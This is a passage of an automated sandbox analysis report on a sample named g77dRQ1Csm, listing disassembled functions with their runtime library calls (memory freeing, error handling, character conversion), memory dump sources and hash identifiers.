                                                                                                                                                                                                                              • _free.LIBCMT ref: 0316F889
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0316F890
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0316F8AD
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0316F8C5
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 161543041-0
                                                                                                                                                                                                                              • Opcode ID: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
                                                                                                                                                                                                                              • Instruction ID: 6cda69b5dd93b4e94139557086e7ded93239983b6e77ef902a3f640f06c31898
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81317E326003019FEB30EAF8E885B5AB3EDEF08254F1854A9E458DB150DF32E972C721
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 0041F565
                                                                                                                                                                                                                                • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8D1
                                                                                                                                                                                                                                • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8E3
                                                                                                                                                                                                                                • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8F5
                                                                                                                                                                                                                                • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E907
                                                                                                                                                                                                                                • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E919
                                                                                                                                                                                                                                • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E92B
                                                                                                                                                                                                                                • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E93D
                                                                                                                                                                                                                                • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E94F
                                                                                                                                                                                                                                • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E961
                                                                                                                                                                                                                                • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E973
                                                                                                                                                                                                                                • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E985
                                                                                                                                                                                                                                • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E997
                                                                                                                                                                                                                                • Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E9A9
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F55A
                                                                                                                                                                                                                                • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
                                                                                                                                                                                                                                • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F57C
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F591
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F59C
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F5BE
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F5D1
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F5DF
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F5EA
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F622
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F629
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F646
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F65E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 161543041-0
                                                                                                                                                                                                                              • Opcode ID: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
                                                                                                                                                                                                                              • Instruction ID: 663e15b0dde773794ed22c5679a1a820cae4c96c2080e6077b97fe37dff8eac1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5316C71500300AFEB20AE7AE805B9773E9FF44318F11446BE849C7262DA79E8D68A18
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                              • Opcode ID: f7272d8640a351cb7ba9f4033a28a6de6cf5ddfcb3ed898df1b07d3bb18c3361
                                                                                                                                                                                                                              • Instruction ID: 835e439df6746d9e4a645f0e3ab6fafaf2a1d36bb3e8ca10982b002e8b7a98f5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f7272d8640a351cb7ba9f4033a28a6de6cf5ddfcb3ed898df1b07d3bb18c3361
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12C15476D40204BBDB20DFA9CC43FDA77F8AF48744F15416AFE05EB282E67499818794
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0042422F), ref: 00423249
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DecodePointer
                                                                                                                                                                                                                              • String ID: /BB$acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                                              • API String ID: 3527080286-1021189420
                                                                                                                                                                                                                              • Opcode ID: 630b55b5aee0cdac9947df96942a2c518d9551f2e4122bfaff5c71f9b894d309
                                                                                                                                                                                                                              • Instruction ID: 713dac25a3a6b9e2a85c2ced730dd83283c3aaa7dc4d76372812c5e21a3eb3ad
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 630b55b5aee0cdac9947df96942a2c518d9551f2e4122bfaff5c71f9b894d309
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C2514F71B00529CBDB10DF58F9485ADBBB0FF49315FE041A6D881A6264CB7D8B2AC72D
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _free.LIBCMT ref: 03166EA0
                                                                                                                                                                                                                                • Part of subcall function 03166501: HeapFree.KERNEL32(00000000,00000000,?,0316F288,?,00000000,?,00000000,?,0316F52C,?,00000007,?,?,0316F920,?), ref: 03166517
                                                                                                                                                                                                                                • Part of subcall function 03166501: GetLastError.KERNEL32(?,?,0316F288,?,00000000,?,00000000,?,0316F52C,?,00000007,?,?,0316F920,?,?), ref: 03166529
                                                                                                                                                                                                                              • _free.LIBCMT ref: 03166EAC
                                                                                                                                                                                                                              • _free.LIBCMT ref: 03166EB7
                                                                                                                                                                                                                              • _free.LIBCMT ref: 03166EC2
                                                                                                                                                                                                                              • _free.LIBCMT ref: 03166ECD
                                                                                                                                                                                                                              • _free.LIBCMT ref: 03166ED8
                                                                                                                                                                                                                              • _free.LIBCMT ref: 03166EE3
                                                                                                                                                                                                                              • _free.LIBCMT ref: 03166EEE
                                                                                                                                                                                                                              • _free.LIBCMT ref: 03166EF9
                                                                                                                                                                                                                              • _free.LIBCMT ref: 03166F07
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
                                                                                                                                                                                                                              • Instruction ID: a74e59ab135270fa331d85b213ae7f364406a1192637f161ef7d34411ea3b14e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F411867A510208BFCB11EFD5C852DDD3BA5EF08398B5145A5FE088F225DB32EA60DB81
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416C39
                                                                                                                                                                                                                                • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
                                                                                                                                                                                                                                • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416C45
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416C50
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416C5B
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416C66
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416C71
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416C7C
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416C87
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416C92
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416CA0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
                                                                                                                                                                                                                              • Instruction ID: bc4a8488de18622ef43ac097d779123cba2550ccea22c0c0e46fff27a6ede036
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B611BC75100118BFDF01FF95D952DD93B65EF48358B42849AFD084F122D635EE919B44
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 0315141C
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0315142E
                                                                                                                                                                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0315146B
                                                                                                                                                                                                                                • Part of subcall function 031580E1: _Yarn.LIBCPMT ref: 03158100
                                                                                                                                                                                                                                • Part of subcall function 031580E1: _Yarn.LIBCPMT ref: 03158124
                                                                                                                                                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 0315148C
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0315149A
                                                                                                                                                                                                                              • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 031514BD
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0315152E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
                                                                                                                                                                                                                              • String ID: n~B
                                                                                                                                                                                                                              • API String ID: 835844855-2489732092
                                                                                                                                                                                                                              • Opcode ID: 64c16167f489f4d77b397d7091ed6621fbd9ca3405d2a72e65d09ca87552aa99
                                                                                                                                                                                                                              • Instruction ID: d64efa20ca70219ceecf6f68ce97e479af59ba4e8cb170b355cae71e7df9fea3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 64c16167f489f4d77b397d7091ed6621fbd9ca3405d2a72e65d09ca87552aa99
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99317072804B40EFC732DF69D84065AFBF4FF4C710B548A2FE4AA96A40C774AA01CB55
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 004011B5
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004011C7
                                                                                                                                                                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00401204
                                                                                                                                                                                                                                • Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407E99
                                                                                                                                                                                                                                • Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407EBD
                                                                                                                                                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 00401225
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00401233
                                                                                                                                                                                                                              • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00401256
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 004012C7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
                                                                                                                                                                                                                              • String ID: bad locale name
                                                                                                                                                                                                                              • API String ID: 835844855-1405518554
                                                                                                                                                                                                                              • Opcode ID: ce3c0b23ff705215117f8776eb420a15f63c887abcc2888264ee72b3a4de71bc
                                                                                                                                                                                                                              • Instruction ID: 0603089b66b0b819d6eff5d75331a99d5985645afad82bc6fef42f715fc6e5ae
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce3c0b23ff705215117f8776eb420a15f63c887abcc2888264ee72b3a4de71bc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0319131904B40DEC7319F6AD941A5BFBF0BF08710B508A7FE05AA3A91C738B904CB59
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: f1502d6197d2a0b4b305fcae2024c2ce003ecf790107f78a60311c4aa9610d50
                                                                                                                                                                                                                              • Instruction ID: 7df4c609087cdeaa16c6eaf0eb6dd5c4482741dbee363e0237d2b93b6535b28d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1502d6197d2a0b4b305fcae2024c2ce003ecf790107f78a60311c4aa9610d50
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94C1AE75A04349AFDF15DFE8C890BADBBB4AF0D310F084199E941AB391C7349962CF65
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 03166F80: GetLastError.KERNEL32(?,?,0315E697,?,?,?,0315ED94,?), ref: 03166F84
                                                                                                                                                                                                                                • Part of subcall function 03166F80: _free.LIBCMT ref: 03166FB7
                                                                                                                                                                                                                                • Part of subcall function 03166F80: SetLastError.KERNEL32(00000000), ref: 03166FF8
                                                                                                                                                                                                                                • Part of subcall function 03166F80: _abort.LIBCMT ref: 03166FFE
                                                                                                                                                                                                                              • _memcmp.LIBVCRUNTIME ref: 03164F5B
                                                                                                                                                                                                                              • _free.LIBCMT ref: 03164FCC
                                                                                                                                                                                                                              • _free.LIBCMT ref: 03164FE5
                                                                                                                                                                                                                              • _free.LIBCMT ref: 03165017
                                                                                                                                                                                                                              • _free.LIBCMT ref: 03165020
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0316502C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                                                              • String ID: C
                                                                                                                                                                                                                              • API String ID: 1679612858-1037565863
                                                                                                                                                                                                                              • Opcode ID: 8da020f59b73da55e944a716f6406de2f80b35aa4703f2a4fd96452cb970ac71
                                                                                                                                                                                                                              • Instruction ID: 92b50f4d932c0f8310b70bb287eeb6f360a32dddacc5613e71e31296fc348b7d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8da020f59b73da55e944a716f6406de2f80b35aa4703f2a4fd96452cb970ac71
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50B14875A012299FDB24DF59C884AADB7B9FF08304F1545EAE949A7350DB31AEA0CF40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                              • _memcmp.LIBVCRUNTIME ref: 00414CF4
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00414D65
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00414D7E
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00414DB0
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00414DB9
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00414DC5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                                                              • String ID: C
                                                                                                                                                                                                                              • API String ID: 1679612858-1037565863
                                                                                                                                                                                                                              • Opcode ID: e89ccd2a3967dbde377b9359045f7db90b46cd3f4383fc33eaa8f2e05e3481b2
                                                                                                                                                                                                                              • Instruction ID: f1eb2fe4340e97ed79650f57c8a8747809c023f352878a21904a4d61aa040acb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e89ccd2a3967dbde377b9359045f7db90b46cd3f4383fc33eaa8f2e05e3481b2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7B12975A012199BDB24DF18D884BEEB7B4FF88304F5045AAE849A7350E735AED1CF48
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77
                                                                                                                                                                                                                              • _free.LIBCMT ref: 004146D7
                                                                                                                                                                                                                              • _free.LIBCMT ref: 004146EE
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041470D
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00414728
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041473F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$AllocateHeap
                                                                                                                                                                                                                              • String ID: B$|B
                                                                                                                                                                                                                              • API String ID: 3033488037-200315465
                                                                                                                                                                                                                              • Opcode ID: 0551716ea73a6ef0ea3937d8a9b0131bc722ba02b4a1552fb15e10019e7b872c
                                                                                                                                                                                                                              • Instruction ID: bceed09af247e51911f2c06e24e965b8c83290834e1de00ea3c3fe4b0a612a45
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0551716ea73a6ef0ea3937d8a9b0131bc722ba02b4a1552fb15e10019e7b872c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F351E631A00304AFDB20DF66D841BAA77F4EF99728F14056EE849DB690E739DD81CB48
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0040F850,0040F850,?,?,?,00416990,00000001,00000001,F5E85006), ref: 00416799
                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 004167D1
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00416990,00000001,00000001,F5E85006,?,?,?), ref: 0041681F
                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 004168B6
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00416919
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00416926
                                                                                                                                                                                                                                • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 0041692F
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00416954
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3864826663-0
                                                                                                                                                                                                                              • Opcode ID: 6d456281acf0619f27023182ced17daa6554775fa394724c4215adca619d4e4e
                                                                                                                                                                                                                              • Instruction ID: 945c2db0b5faf58cb0d9801c543b0b3226d139e5166d8e9d93898d86eb794442
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d456281acf0619f27023182ced17daa6554775fa394724c4215adca619d4e4e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B51E6B2610216ABDB259F65CC41EFF7BA9EF44754F16462EFC04D6280DB38DC90C668
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                              • Opcode ID: b86ba08727650023ed19c92e77eeb825199b3895615cbf632ae48cc155c5a0ec
                                                                                                                                                                                                                              • Instruction ID: abcf625ff7969a94618e6e58a4efa54025cc67bea20c63d1569e041bbe35c6d4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b86ba08727650023ed19c92e77eeb825199b3895615cbf632ae48cc155c5a0ec
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1061E676D00305AFDB20DFE8D841B9ABBF5EF4C750F1441AAE944EB284DB709952CB50
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                              • Opcode ID: 5e932ea9069c118bb961e6d76857f0c9b8f4ba2cd0390af678983e5fd13f1dd1
                                                                                                                                                                                                                              • Instruction ID: e986a1f43705154f11102f288933750ce46d6c5c7240a2201f23140d39e68ccb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e932ea9069c118bb961e6d76857f0c9b8f4ba2cd0390af678983e5fd13f1dd1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6761A076904305AFDB20DF66C842BDABBF4EF48710F1441ABEC44EB281D7749D828B98
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
